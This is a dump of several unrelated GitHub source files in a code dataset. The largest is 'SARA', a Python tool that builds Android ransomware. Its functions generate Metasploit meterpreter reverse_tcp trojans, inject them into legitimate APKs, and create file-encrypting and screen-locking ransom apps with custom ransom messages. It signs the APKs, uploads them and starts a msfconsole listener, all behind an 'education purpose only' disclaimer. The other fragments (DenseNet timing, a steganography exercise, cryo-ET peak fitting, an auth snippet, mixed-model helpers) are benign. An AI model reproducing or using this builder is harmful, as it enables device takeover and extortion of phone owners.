datetime.datetime.now()\n _ = DenseNet.predict(X_train_multi)\n b = datetime.datetime.now()\n\n total += (b - a).microseconds / 1000\n\nprint(\"DenseNet inference time : \", total / 10, \"ms\")\n","repo_name":"cuongphamduc/DDoS-Classification","sub_path":"test_speed.py","file_name":"test_speed.py","file_ext":"py","file_size_in_byte":3097,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"75153564035","text":"# coding: utf8\n# chargement des fonctionalité d'image ainsi que de low et high\nfrom stegano import *\n\n# charge le fichier\nsize, image = image_load('message_x.png')\n\n# crée une nouvelle image de résultat\nresult = image_new(size)\n\n# ici votre code de decodage\n...\n\n# sauvegarde l'image\nimage_save(result, size, 'resultat.png')\n","repo_name":"guibou/teaching_iut2017_cg_intro","sub_path":"seance_4_Stegano/decode.py","file_name":"decode.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"33730901507","text":"import numpy as np\nimport mrcfile\nimport scipy.ndimage, scipy.signal\nfrom tomoxtal.utils import phases as phases_utils\nfrom tomoxtal.utils import visualize\n\n\nclass PeakFitter:\n\n def __init__(self, volume, coords, hkl, box_size):\n \"\"\"\n Initialize class.\n \n Parameters\n ----------\n volume : string\n path to real space crystal volume / tomogram in .mrc format\n coords : numpy.ndarray, shape (n_refls, 3), dtype int\n predicted or refined reflection coordinates\n hkl : numpy.ndarray, shape (n_refls, 3), dtype int\n Miller indices, 
ordered as coords\n box_size : int\n dimensions of box to extract\n \"\"\"\n self.ivols, self.pvols = self.extract_subvolumes(volume, coords, hkl, box_size)\n self.radii = self.subvol_radii(box_size)\n self.tightmask = np.ones((box_size,box_size,box_size)) \n \n def subvol_radii(self, box_size):\n \"\"\"\n Generate a cubic subvolume of length box_size whose values\n are the radii of each voxel, to be used during peak-fitting.\n\n Parameters\n ----------\n box_size : int\n length of cubic subvolume\n\n Returns\n -------\n radii : numpy.ndarray, shape (box_size, box_size, box_size)\n subvolume of each voxel's radius from center\n \"\"\"\n ls = np.linspace(-1, 1, box_size+1)\n ls = (ls[:-1] + ls[1:])/2\n radii = np.meshgrid(ls, ls, ls, indexing='ij')\n radii = np.sqrt(np.sum(np.square(radii), axis=0))\n return radii\n \n def generate_tightmask(self, tm_boxsize):\n \"\"\"\n Generate a tight mask centered in the subvolume, where the central region \n of dimensions given by tm_boxsize have a value of 1. An anisotropic tight\n mask is permitted given the anisotropy imposed by the missing wedge.\n\n Parameters\n ----------\n tm_boxsize : int or tuple of (int,int,int)\n dimensions of region to mask in pixels; if type int, then an isotropic\n subregion is masked\n\n Returns\n -------\n tightmask : numpy.ndarray, shape (N,N,N)\n mask of self.ivols shape, with a central subregion one-valued\n \"\"\"\n subvol_dims = np.array(self.radii.shape)\n center = np.array(0.5*subvol_dims).astype(int)\n\n if type(tm_boxsize) == int:\n tm_boxsize = (tm_boxsize,tm_boxsize,tm_boxsize)\n tm_boxsize = np.array(0.5*np.array(tm_boxsize)).astype(int)\n\n tightmask = np.zeros(subvol_dims)\n tightmask[center[0]-tm_boxsize[0]:center[0]+tm_boxsize[0]+1,\n center[1]-tm_boxsize[1]:center[1]+tm_boxsize[1]+1,\n center[2]-tm_boxsize[2]:center[2]+tm_boxsize[2]+1] = 1\n\n return tightmask\n \n def eliminate_phase_splitting(self, volume):\n \"\"\"\n Pre-process real space volume to prevent a circular discontinuity\n when taking the Fourier transform and thus phase splitting. 
This\n        is accomplished by applying a window function and then shifting the\n        center of the volume to the corner/origin of the Fourier transform.\n        \n        Parameters\n        ----------\n        volume : numpy.ndarray, shape (N,N,N)\n            cubic volume of real space crystal\n        \n        Returns\n        -------\n        volume : numpy.ndarray, shape (N,N,N)\n            volume after applying a window function and FFT-shift\n        \"\"\"\n        assert volume.shape[0] == volume.shape[1] == volume.shape[2]\n        \n        # apply a Tukey kernel so that borders fall to 0\n        k = scipy.signal.tukey(volume.shape[0])\n        k3d = k[:,np.newaxis,np.newaxis] * k[np.newaxis,:,np.newaxis] * k[np.newaxis,np.newaxis,:]\n        volume *= k3d\n        \n        # shift center to origin of volume\n        return np.fft.fftshift(volume)\n    \n    def extract_subvolumes(self, volume, coords, hkl, box_size):\n        \"\"\"\n        Extract intensity and phase subvolumes centered on the reflections.\n        \n        Parameters\n        ----------\n        volume : string\n            path to real space crystal volume / tomogram in .mrc format\n        coords : numpy.ndarray, shape (n_refls, 3), dtype int\n            predicted or refined reflection coordinates\n        hkl : numpy.ndarray, shape (n_refls, 3), dtype int\n            Miller indices, ordered as coords\n        box_size : int\n            dimensions of box to extract\n\n        Returns\n        -------\n        ivols : dictionary\n            Miller index: subvolume array of intensities\n        pvols : dictionary\n            Miller index: subvolume array of phases in degrees\n        \"\"\"\n        \n        hb = int(box_size/2)\n        pvols, ivols = dict(), dict()\n        \n        # Fourier transform real space volume\n        volume = mrcfile.open(volume).data.copy().astype(np.float32)\n        volume = self.eliminate_phase_splitting(volume)\n        ftI, ftp = phases_utils.ft_to_I_phase(phases_utils.compute_ft(volume), deg=True)\n        \n        # extract phase and intensity subvolumes around each predicted peak\n        for i,miller in enumerate(hkl):\n            c = coords[i]\n            ivols[tuple(miller)] = ftI[c[0]-hb:c[0]+hb+1,c[1]-hb:c[1]+hb+1,c[2]-hb:c[2]+hb+1]\n            pvols[tuple(miller)] = ftp[c[0]-hb:c[0]+hb+1,c[1]-hb:c[1]+hb+1,c[2]-hb:c[2]+hb+1]\n        \n        return ivols, pvols\n    \n    def fit_peak(self, ivol, pvol, isigma, psigma, weighted=True, tm_boxsize=None):\n        \"\"\"\n        Fit the peak in the intensity/phase subvolumes. First, high-intensity pixels \n        are selected and the set of contiguous, selected pixels nearest the subvolume\n        center is chosen. Then, pixels from this selection are discarded until their \n        phase standard deviation is less than the psigma threshold. 
\n\n Parameters\n ----------\n ivol : numpy.ndarray, shape (N,N,N)\n subvolume of intensities\n pvol : numpy.ndarray, shape (N,N,N)\n subvolume of phases in degrees\n isigma : float\n threshold, pixel selected if its intensity > mean + isigma * std dev\n psigma : float\n threshold in degrees, pixels discarded while phase std dev exceeds this value\n weighted : bool\n whether to intensity-weight the mean phase calculation\n tm_boxsize : int or tuple of (int,int,int)\n dimensions of central region of subvolume to consider for peak-fitting.\n The mask will default to its previously-used value if set before.\n \n Returns\n -------\n ival : float\n peak intensity, or 0 if no peak was found\n pval : float\n peak phase in degrees, or 0 if no peak was found\n mask : numpy.ndarray, shape (N,N,N)\n subvolume in which 1 indicates that voxel was retained during peak fitting\n \"\"\"\n # generate a tight mask as requested\n if tm_boxsize is not None:\n self.tightmask = self.generate_tightmask(tm_boxsize)\n\n # identify high intensity pixels\n ithreshold = ivol.mean() + isigma*ivol.std()\n imask = np.zeros_like(ivol)\n imask[np.where((ivol>ithreshold) & (self.tightmask==1))] = 1\n indices = np.array(np.where(imask==1))\n \n # condition of no high intensity pixels in valid region\n if indices.size == 0:\n return 0, 0, np.zeros(self.radii.shape)\n\n # find set of contiguous pixels that are nearest to the center\n struct = scipy.ndimage.generate_binary_structure(3, 1)\n labeled, ncomponents = scipy.ndimage.measurements.label(imask, struct)\n d = {nc:np.mean(self.radii[labeled==nc]) for nc in range(1,ncomponents+1)}\n label = min(d, key=d.get)\n\n # select relevant intensity and phase values\n ivals = ivol[np.where(labeled==label)]\n pvals = pvol[np.where(labeled==label)]\n indices = np.array([np.where(labeled==label)])\n\n # discard pixels until psigma threshold is met\n if phases_utils.std_phases(pvals, weights=ivals) > psigma:\n sort_idx = np.argsort(ivals)\n ivals, pvals = ivals[sort_idx], pvals[sort_idx]\n\n for ni in range(ivals.shape[0]):\n if phases_utils.std_phases(pvals[ni:], weights=ivals[ni:]) < psigma:\n break\n ivals, pvals = ivals[ni:], pvals[ni:]\n indices = indices.T[sort_idx][ni:]\n else:\n indices = indices.T\n \n # compute peak intensity and phase\n ival = np.mean(ivals)\n if weighted:\n pval = phases_utils.average_phases(pvals, weights=ivals)\n else:\n pval = phases_utils.average_phases(pvals)\n print(\"Phases:\", pvals)\n\n # generate a mask to spatially track retained pixels\n mask = np.zeros(self.radii.shape)\n mask[indices[:,0], indices[:,1], indices[:,2]] = 1\n \n return ival, pval, mask\n \n def fit_all_peaks(self, isigma, psigma, weighted=True, tm_boxsize=None):\n \"\"\"\n Fit the Bragg peak intensity and phase in each subvolume.\n \n Parameters\n ----------\n isigma : float\n threshold, pixel selected if its intensity > mean + isigma * std dev\n psigma : float\n threshold in degrees, pixels discarded while phase std dev exceeds this value\n weighted : bool\n whether to intensity-weight the mean phase calculation\n tm_boxsize : int or tuple of (int,int,int)\n dimensions of central region of subvolume to consider for peak-fitting\n \n Returns\n -------\n hklIp : numpy.ndarray, shape (N, 5)\n data array of [h,k,l,intensity,phase]; phase is in degrees and from peak-fitting\n \"\"\"\n # set up storage array and dictionaries\n hklIp = np.zeros((len(self.ivols.keys()), 5))\n self.masks = dict()\n \n # generate a tight mask as requested\n if tm_boxsize is not None:\n self.tightmask = 
self.generate_tightmask(tm_boxsize)\n        \n        # fit all peaks\n        for i,miller in enumerate(self.ivols.keys()):\n            print(f\"Fitting reflection {miller}\")\n            peakI, peakp, self.masks[miller] = self.fit_peak(self.ivols[miller],\n                                                             self.pvols[miller],\n                                                             isigma,\n                                                             psigma,\n                                                             weighted=weighted)\n            if peakI == 0:\n                print(f\"Warning: no peak found for reflection {miller}\")\n            hklIp[i] = np.array(miller + (peakI, peakp))\n        \n        # remove any peaks that couldn't be fit\n        hklIp = hklIp[hklIp[:,3]!=0]\n        \n        return hklIp\n    \n    def visualize_peak(self, miller, sl=None, use_mask=True):\n        \"\"\"\n        Generate a figure that visualizes cross-sections through the peak's intensity\n        and phase values.\n        \n        Parameters\n        ----------\n        miller : tuple, shape 3, optional \n            Miller indices for reflection, if provided use as plot title\n        sl : int, optional\n            index for slicing through subvolumes; if None, show central slices\n        use_mask : bool\n            if True, overlay the mask of voxels retained during peak fitting\n        \"\"\"\n        mvol = None\n        if use_mask:\n            mvol = self.masks[miller]\n        \n        visualize.visualize_peak(self.ivols[miller],\n                                 self.pvols[miller],\n                                 mvol=mvol, \n                                 miller=miller,\n                                 sl=sl)\n        return 
user\n","repo_name":"shivamg7/AspireLoans","sub_path":"app/auth/dependencies.py","file_name":"dependencies.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39563545057","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# style and colors\ni = '\\033[3m'\nu = '\\033[4m'\nw = '\\033[0m'\nr = '\\033[1;91m'\ng = '\\033[1;92m'\ny = '\\033[1;33m'\nb = '\\033[1;94m'\nd = '\\033[90m'\n# global variable\nhide = '> /dev/null 2>&1'\nsara = f'{d}<{b}sara{d}>{w}'\nuser = f'{d}<{g}user{d}>{w}'\n# import module\ntry:\n import os\n import re\n import sys\n import time\n import json\n import random\n import datetime\n import requests\n import fileinput\n from PIL import Image\nexcept (ModuleNotFoundError):\n exit(f'''\n{sara} : It seems there is a module that you have not installed\n run this command \\'{g}pip install -r requirements.txt{w}\\'\n to install it.\n ''')\n# banner (sara-v3.0)\ndef banner():\n os.system(\"cls\" if os.name == \"nt\" else \"clear\")\n print(w+d+\" ,, ,,\")\n print(w+d+\" ((((( )))))\")\n print(w+d+\" (((((( ))))))\")\n print(w+d+\" (((((( ))))))\")\n print(w+d+\" (((((\"+w+b+\",r@@@@@@@@@@e,\"+w+d+\")))))\")\n print(w+d+\" (((\"+w+b+\"@@@@@@@@@@@@@@@@\"+w+d+\")))\")\n print(w+b+\" \\@@/\"+r+\",:::,\"+w+b+\"\\/\"+r+\",:::,\"+w+b+\"\\@@/\")\n print(w+b+\" /@@@|\"+r+\":::::\"+w+b+\"||\"+r+\":::::\"+w+b+\"|@@@\\\\\")\n print(w+b+\" / @@@\\\\\"+r+\"':::'\"+w+b+\"/\\\\\"+r+\"':::'\"+w+b+\"/@@@ \\\\ \"+w+\"'\"+r+\"Beware of Ransomware\"+b+w+\"'\")\n print(w+b+\" / /@@@@@@@//\\\\\\@@@@@@@\\ \\\\ \"+d+\"version 3.0\"+w)\n print(w+b+\" ( / '@@@@@====@@@@@' \\ )\")\n print(w+b+\" \\( / \\ )/\")\n print(w+b+\" \\ ( ) /\")\n print(w+b+\" \\ /\"+w)\n# print letter by letter\ndef prints(text):\n for line in text:\n print(line, end='', flush=True)\n time.sleep(0.008)\n print('')\n# print truncate strings\ndef truncates(text, maxx=20):\n if len(text) > maxx: return text[:maxx - 3] + \"...\"\n else: return text\n# search and replace specific string\ndef replace_string(oldstr, newstr, file):\n text = f'{sara} : add \\'{d}{truncates(newstr)}{w}\\' on \\'{d}{os.path.basename(file)}{w}\\' ... '\n print(text + f'{y}wait{w}', end='\\r')\n os.system(f'sed -i \\'s#{oldstr}#{newstr}#g\\' {file}')\n time.sleep(0.05)\n if not int(os.popen(f'grep -rc \\'{newstr}\\' {file}', 'r').readline().strip()) > 0: exit(text + f'{r}fail{w}')\n print(text + f'{g}done{w}')\n return newstr\n# search and replace specific string 2\ndef replace_strings(oldstr, newstr, file):\n replaces = {oldstr:newstr}\n for line in fileinput.input(file, inplace=True):\n for search in replaces:\n replaced = replaces[search]\n line = line.replace(search,replaced)\n print(line, end=\"\")\n# add new icon path (for msfvenom apk)\ndef add_new_icon(icon, path):\n text = f'{sara} : add \\'{d}ic_launcher.png{w}\\' into \\'{d}mipmap-hdpi-v4{w}\\' ... '\n file = f'{path}/res/mipmap-hdpi-v4/ic_launcher.png'\n print(text + f'{y}wait{w}', end='\\r')\n os.system(f'mkdir -p {path}/res/mipmap-hdpi-v4/')\n os.system(f'cp -r {icon} {file} {hide}')\n if not os.path.isfile(file): exit(text + f'{r}fail{w}')\n print(text + f'{g}done{w}')\n text = f'{sara} : add \\'{d}ic_launcher.png{w}\\' into \\'{d}AndroidManifest.xml{w}\\' ... 
'\n print(text + f'{y}wait{w}', end='\\r')\n os.system(f'sed -i \\'s#app_name', f'\"app_name\">{name}', f'{path}/res/values/strings.xml')\n replace_string('app_name', name, f'{path}/smali/com/termuxhackersid/services/EncryptionService.smali')\n replace_string('app_name', name, f'{path}/smali/com/termuxhackersid/services/DecryptionService.smali')\n replace_string('app_desc', desc, f'{path}/smali/com/termuxhackersid/services/EncryptionService.smali')\n replace_string('app_desc', desc, f'{path}/smali/com/termuxhackersid/ui/MainActivity$a.smali')\n replace_string('app_desc', desc, f'{path}/smali/com/termuxhackersid/ui/MainActivity.smali')\n text = f'{sara} : add \\'{d}{os.path.basename(icon)}{w}\\' into \\'{d}ic_launcher{w}\\' ... '\n print(text + f'{y}wait{w}', end='\\r')\n for line in os.popen(f'find -O3 -L {path} -name \\'ic_launcher.png\\'', 'r').read().splitlines():\n if os.path.isfile(line):\n with Image.open(line) as f:\n X, Z = f.size\n size = str(X) + 'x' + str(Z)\n logo = 'lock-' + os.path.basename(icon)\n os.system(f'cp -R {icon} {logo}')\n os.system(f'mogrify -resize {size} {logo};cp -R {logo} {line};rm -rf {logo}')\n else: exit(text + f'{r}fail{w}')\n print(text + f'{g}done{w}')\n random_digit = str(random.randint(1,9))\n random_version = f'{random_digit}.0'\n rename_version_code(random_digit, path)\n rename_version_name(f'{random_version} by @{name.lower().replace(\" \",\"\")}', path)\n file = recompile(path)\n apps = uber_apk_signer(file)\n upload_file(apps)\n return apps\n\n# generate custom screen locker ransomware (passprhase)\ndef genertare_screen_locker(name, head, desc, keys, icon):\n base = 'data/tmp/lockscreen.apk'\n path = name.lower().replace(' ', '')\n file = path + '.apk'\n os.system(f'cp -f {base} {file}')\n decompile(file)\n replace_string('\"app_name\">app_name', f'\"app_name\">{name}', f'{path}/res/values/strings.xml')\n replace_string('app_head', head, f'{path}/res/values/strings.xml')\n replace_string('app_desc', desc, f'{path}/res/values/strings.xml')\n print(f'{sara} : add \\'{d}{keys}{w}\\' as passprhase ... {y}wait{w}', end='\\r')\n replace_strings('app_keys', keys, f'{path}/smali/com/termuxhackers/id/MyService$100000000.smali')\n print(f'{sara} : add \\'{d}{keys}{w}\\' as \\'{d}passprhase{w}\\' ... {g}done{w}')\n text = f'{sara} : add \\'{d}{os.path.basename(icon)}{w}\\' into \\'{d}ic_launcher{w}\\' ... 
'\n print(text + f'{y}wait{w}', end='\\r')\n for line in os.popen(f'find -O3 -L {path} -name \\'ic_launcher.png\\'', 'r').read().splitlines():\n if os.path.isfile(line):\n with Image.open(line) as f:\n X, Z = f.size\n size = str(X) + 'x' + str(Z)\n logo = 'lock-' + os.path.basename(icon)\n os.system(f'cp -R {icon} {logo}')\n os.system(f'mogrify -resize {size} {logo};cp -R {logo} {line};rm -rf {logo}')\n else: exit(text + f'{r}fail{w}')\n print(text + f'{g}done{w}')\n random_digit = str(random.randint(1,9))\n random_version = f'{random_digit}.0'\n rename_version_code(random_digit, path)\n rename_version_name(f'{random_version} by @{name.lower().replace(\" \",\"\")}', path)\n file = recompile(path)\n apps = uber_apk_signer(file)\n upload_file(apps)\n return apps\n\n# listening trojan with msfconsole (metasploit)\ndef start_trojan_listener(host, port):\n prints(f'''\n{sara} : redirecting to the metasploit console\n payload = \\'{r}android/meterpreter/reverse_tcp{w}\\'\n with host = \\'{y}{host}{w}\\' and port = \\'{y}{port}{w}\\'\n listening as job (0).\n ''')\n os.system(f'msfconsole -q -x \"use payload/android/meterpreter/reverse_tcp;set lhost {host};set lport {port};exploit -j\"')\n# signing apk file with uber-apk-signer (JAR)\ndef uber_apk_signer(file):\n text = f'{sara} : signing \\'{d}{file}{w}\\' using uber-apk-signer ... '\n print(text + f'{y}wait{w}', end='\\r')\n sign = os.path.basename(file).replace('.apk', '')\n os.system(f'java -jar data/bin/ubersigner.jar -a {file} --ks data/key/debug.jks --ksAlias debugging --ksPass debugging --ksKeyPass debugging {hide}')\n os.system(f'rm -rf {file} *.idsig {hide}')\n os.system(f'cp -rf {sign}-aligned-signed.apk {sign}.apk {hide}; rm -rf {sign}-aligned-signed.apk {hide}')\n if not os.path.isfile(f'{sign}.apk'): exit(text + f'{r}fail{w}')\n print(text + f'{g}done{w}')\n return sign + '.apk'\n# decompiling apk file with apktool\ndef decompile(file):\n text = f'{sara} : decompile \\'{d}{file}{w}\\' using apktool ... '\n path = os.path.basename(file).replace('.apk', '')\n print(text + f'{y}wait{w}', end='\\r')\n os.system(f'apktool d {file} {hide}')\n if not os.path.isdir(path): exit(text + f'{r}fail{w}')\n print(text + f'{g}done{w}')\n os.remove(file)\n return path\n# recompiling apk path with apktool (with aapt2 as second options)\ndef recompile(path):\n text = f'{sara} : recompile \\'{d}{path}{w}\\' using apktool ... '\n file = path + '.apk'\n print(text + f'{y}wait{w}', end='\\r')\n os.system(f'apktool b {path} -o {file} {hide}')\n if not os.path.isfile(file):\n print(text + f'{y}wait{w} ({d}aapt2{w})', end='\\r')\n os.system(f'apktool b {path} -o {file} --use-aapt2 {hide}')\n time.sleep(0.5)\n if not os.path.isfile(file): exit(text + f'{r}fail{w}')\n print(text + f'{g}done{w}')\n os.system(f'rm -rf {path} {hide}')\n return file\n# SARA V3.0\nclass __sara__:\n\n def __init__(self):\n self.user = str(os.popen('whoami', 'r').readline().strip())\n self.ipv4 = '127.0.0.1'\n self.data = 'data'\n \n def custom_trojan(self):\n banner()\n prints(f'''\n{sara} : you can fill or leave blank for using\n default configuration. 
the default configuration is\n host = \\'{y}{self.ipv4}{w}\\' port = \\'{y}4444{w}\\' name = \\'{r}trojan.apk{w}\\'\n and icon = \\'{r}data/tmp/icon.png{w}\\'.\n\n custom trojan apk (client)\n ''')\n name = str(input(f' set app name: '))\n if not name: name = 'trojan'\n icon = str(input(f' set app icon: '))\n if not os.path.isfile(icon): icon = 'data/tmp/icon.png'\n host = str(input(f' set app host: '))\n if not host: host = self.ipv4\n port = str(input(f' set app port: '))\n if not port: port = '4444'\n prints(f'''\n{sara} : well this process takes a few minutes,\n please be patient until the process is complete \n ''')\n file = generate_trojan(host, port, name.replace(' ', '').replace('.apk', '').lower())\n path = decompile(file)\n replace_string('MainActivity', name, f'{path}/res/values/strings.xml')\n add_new_icon(icon, path)\n for line in os.popen(f'grep -rc \\'metasploit\\' {path}', 'r').read().splitlines():\n line = line.split(':')\n if int(line[1]) > 0: replace_string('metasploit', path, line[0])\n rename_dir(f'{path}/smali/com/metasploit/', f'{path}/smali/com/{path}/')\n random_digit = str(random.randint(1,9))\n random_version = f'{random_digit}.0'\n rename_version_code(random_digit, path)\n rename_version_name(f'{random_version} by @{path}', path)\n apps = recompile(path)\n apps = uber_apk_signer(apps)\n upload_file(apps)\n if not os.path.isfile(apps): exit(f'\\n{sara} : sorry, failed to build \\'{d}{apps}{w}\\' :( \\n')\n prints(f'''\n{sara} : your trojan apps successfully created\n the application is saved as \\'{g}{apps}{w}\\'\n \n do you want to start listener ?\n \n (1) yes, i want to set new host and port\n (2) yes, i want to use previous host and port\n (3) no thanks, i want to exit\n ''')\n ask = str(input(f'{user} : '))\n if ask in ('1' , '01'):\n host = str(input(f'{user} : set host > '))\n if not host: host = self.ipv4\n port = str(input(f'{user} : set port > '))\n if not port: port = '4444'\n elif ask in ('2', '02'): pass\n else: exit(f'\\n{sara} : process completed successfully ...\\n')\n start_trojan_listener(host, port)\n\n def infect_trojan(self):\n banner()\n prints(f'''\n{sara} : you can fill or leave blank for using default config\n the default configuration is apps = \\'{r}REQUIRED{w}\\'\n host = \\'{y}{self.ipv4}{w}\\' and port = \\'{y}4444{w}\\'.\n\n infect trojan apk (client)\n ''')\n orig = str(input(f' set ori apps: '))\n if not os.path.isfile(orig): exit(f'{sara} : file \\'{d}{orig}{w}\\' doesn\\'t exist !')\n host = str(input(f' set app host: '))\n if not host: host = self.ipv4\n port = str(input(f' set app port: '))\n if not port: port = '4444'\n prints(f'''\n{sara} : well this process takes a few minutes,\n please be patient until the process is complete \n ''')\n file = generate_infected_trojan(host, port, orig)\n upload_file(file)\n if not os.path.isfile(file): exit(f'\\n{sara} : sorry, failed to build \\'{d}{file}{w}\\' :( \\n')\n prints(f'''\n{sara} : your trojan apps successfully created\n the application is saved as \\'{g}{file}{w}\\'\n \n do you want to start listener ?\n \n (1) yes, i want to set new host and port\n (2) yes, i want to use previous host and port\n (3) no thanks, i want to exit\n ''')\n ask = str(input(f'{user} : '))\n if ask in ('1' , '01'):\n host = str(input(f'{user} : set host > '))\n if not host: host = self.ipv4\n port = str(input(f'{user} : set port > '))\n if not port: port = '4444'\n elif ask in ('2', '02'): pass\n else: exit(f'\\n{sara} : process completed successfully ...\\n')\n start_trojan_listener(host, port)\n \n 
def custom_file_locker(self):\n banner()\n prints(f'''\n{sara} : you can fill or leave blank for using default config\n the default configuration is name = \\'{r}File Locker{w}\\'\n desc = \\'{r}Your File Have Been Encrypted{w}\\'\n and icon = \\'{y}data/tmp/icon.png{w}\\'.\n\n custom file locker apk (encrypter)\n ''')\n name = str(input(f' set app name: '))\n if not name: name = 'File Locker'\n desc = str(input(f' set app desc: '))\n if not desc: desc = 'Your File Have Been Encrypted'\n icon = str(input(f' set app icon: '))\n if not os.path.isfile(icon): icon = 'data/tmp/icon.png'\n prints(f'''\n{sara} : well this process takes a few minutes,\n please be patient until the process is complete \n ''')\n file = genertare_file_locker(name, desc, icon)\n os.system(f'cp -r data/tmp/decrypter.apk .')\n if not os.path.isfile(file): exit(f'\\n{sara} : sorry, failed to build \\'{d}{file}{w}\\' :( \\n')\n prints(f'''\n{sara} : your file locker apps successfully created\n the encrypter is saved as \\'{g}{file}{w}\\'\n the decrypter is saved as \\'{g}decrypter.apk{w}\\'\n ''')\n \n def custom_screen_locker(self):\n banner()\n prints(f'''\n{sara} : you can fill or leave blank for using default config\n the default configuration is name = \\'{r}Screen Locker{w}\\'\n head = \\'{r}Your Phone Is Locked{w}\\'\n desc = \\'{r}locked by sara@termuxhackers-id{w}\\'\n icon = \\'{y}data/tmp/icon.png{w}\\' and keys = \\'{y}s3cr3t{w}\\'\n\n custom lock screen apk (passprhase)\n ''')\n name = str(input(f' set app name: '))\n if not name: name = 'Screen Locker'\n head = str(input(f' set app head: '))\n if not head: head = 'Your Phone Is Locked'\n desc = str(input(f' set app desc: '))\n if not desc: desc = 'locked by sara@termuxhackers-id'\n icon = str(input(f' set app icon: '))\n if not os.path.isfile(icon): icon = 'data/tmp/icon.png'\n keys = str(input(f' set app keys: '))\n if not keys: keys = 's3cr3t'\n prints(f'''\n{sara} : well this process takes a few minutes,\n please be patient until the process is complete \n ''')\n file = genertare_screen_locker(name, head, desc, keys, icon)\n if not os.path.isfile(file): exit(f'\\n{sara} : sorry, failed to build \\'{d}{file}{w}\\' :( \\n')\n prints(f'''\n{sara} : your screen locker apps successfully created\n the application is saved as \\'{g}{file}{w}\\'\n the secret key (passprhase) \\'{g}{keys}{w}\\'\n ''')\n\n def menu(self):\n banner()\n prints(f'''\n{sara} : Hi user, welcome to @{y}SARA{w} :)\n\n{sara} : sara is a simple android ransomware attack\n this tool is made for education purpose only\n the author is not responsible for any loses\n or damage caused by this programs.\n\n{sara} : can i help you ?\n \n (1) build trojan ransomware ({b}metasploit{w})\n (2) build locker ransomware ({b}filelocker{w})\n (3) build screen ransomware ({b}screenlock{w})\n (4) exit!\n ''')\n while True:\n main = str(input(f'{user} : '))\n if main in ('1', '01'):\n banner()\n prints(f'''\n{sara} : ok, you can choose one ...\n\n (1) build custom trojan ({b}metasploit{w})\n (2) build trojan and infect ({b}metasploit{w})\n (3) back to previous\n ''')\n while True:\n main_menu = str(input(f'{user} : '))\n if main_menu in ('1', '01'): self.custom_trojan() \n elif main_menu in ('2', '02'): self.infect_trojan()\n elif main_menu in ('3', '03', 'back'): pass\n else: print(f'{sara} : sorry, no command found for: {main_menu}'); continue\n break\n elif main in ('2', '02'): self.custom_file_locker()\n elif main in ('3', '03'): self.custom_screen_locker()\n elif main in ('4', '04', 'exit'): exit(1)\n 
else: print(f'{sara} : sorry, no command found for: {main}'); continue\n            break\n        input(f'{sara} : press enter for back to \\'{g}main menu{w}\\' (enter) ')\n        self.menu()\n\nif __name__ == '__main__':\n    try: __sara__().menu()\n    except KeyboardInterrupt: exit(1)\n","repo_name":"termuxhackers-id/SARA","sub_path":"sara.py","file_name":"sara.py","file_ext":"py","file_size_in_byte":21515,"program_lang":"python","lang":"en","doc_type":"code","stars":261,"dataset":"github-code","pt":"61"} +{"seq_id":"44490691627","text":"from typing import Sequence, Iterator, Dict\n\nimport torch\nimport numpy as np\n\n\ndef validate_1d_like(x):\n    if len(x.shape) > 1:\n        extra_shape = list(x.shape[1:])\n        if extra_shape == ([1] * len(extra_shape)):\n            for _ in range(len(extra_shape)):\n                x = x.squeeze(-1)\n    if len(x.shape) != 1:\n        raise ValueError(f\"Expected 1D tensor; instead got `{x.shape}`\")\n    return x\n\n\ndef log_chol_to_chol(log_diag: torch.Tensor, off_diag: torch.Tensor) -> torch.Tensor:\n    assert log_diag.shape[:-1] == off_diag.shape[:-1]\n\n    rank = log_diag.shape[-1]\n    L1 = torch.diag_embed(torch.exp(log_diag))\n\n    L2 = torch.zeros_like(L1)\n    mask = torch.tril_indices(rank, rank, offset=-1)\n    L2[mask[0], mask[1]] = off_diag\n    return L1 + L2\n\n\ndef chunk_grouped_data(*tensors, group_ids: Sequence):\n    \"\"\"\n    Sort rows by group and split each tensor into contiguous per-group chunks.\n\n    :param tensors: tensors whose first dimension corresponds to group_ids\n    :param group_ids: 1d sequence of group labels, one per row\n    :return: list with one entry per group, each a tuple of that group's rows of every tensor\n    \"\"\"\n    group_ids = validate_1d_like(np.asanyarray(group_ids))\n\n    # torch.split requires we put groups into contiguous chunks:\n    sort_idx = np.argsort(group_ids)\n    group_ids = group_ids[sort_idx]\n    tensors = [x[sort_idx] for x in tensors]\n\n    # much faster approach to chunking than something like `[X[gid==group_ids] for gid in np.unique(group_ids)]`:\n    _, counts_per_group = np.unique(group_ids, return_counts=True)\n    counts_per_group = counts_per_group.tolist()\n\n    group_data = []\n    for chunk_tensors in zip(*(torch.split(x, counts_per_group) for x in tensors)):\n        group_data.append(chunk_tensors)\n    return group_data\n\n\ndef validate_tensors(*args: torch.Tensor) -> Iterator[torch.Tensor]:\n    for arg in args:\n        if torch.isnan(arg).any():\n            raise ValueError(\"`nans` in tensor\")\n        if torch.isinf(arg).any():\n            raise ValueError(\"`infs` in tensor\")\n        yield arg\n\n\ndef validate_group_ids(group_ids: Sequence, num_grouping_factors: int) -> np.ndarray:\n    group_ids = np.asanyarray(group_ids)\n    if num_grouping_factors > 1:\n        if len(group_ids.shape) != 2 or group_ids.shape[1] != num_grouping_factors:\n            raise ValueError(\n                f\"There are {num_grouping_factors} grouping-factors, so `group_ids` should be 2d with 2nd \"\n                f\"dimension of this extent.\"\n            )\n    else:\n        group_ids = validate_1d_like(group_ids)[:, None]\n    return group_ids\n\n\ndef get_yhat_r(design: dict,\n               X: torch.Tensor,\n               group_ids: np.ndarray,\n               res_per_gf: dict) -> torch.Tensor:\n    \"\"\"\n    Get yhat for random-effects.\n\n    :param design: A dictionary with keys as grouping factors and values as indices in the model-matrix.\n    :param X: The model-matrix.\n    :param group_ids: The group-ids.\n    :param res_per_gf: A dictionary with keys as grouping factors and values as random-effect coefficients.\n    :return: A tensor with rows corresponding to the model-matrix and columns corresponding to the grouping-factors.\n    \"\"\"\n    yhat_r = torch.empty(*group_ids.shape)\n    for i, (gf, col_idx) in enumerate(design.items()):\n        Xr = torch.cat([torch.ones((len(X), 1)), X[:, col_idx]], 1)\n        _, group_idx = np.unique(group_ids[:, i], return_inverse=True)\n        betas_broad = res_per_gf[gf][group_idx]\n        yhat_r[:, i] = (Xr * 
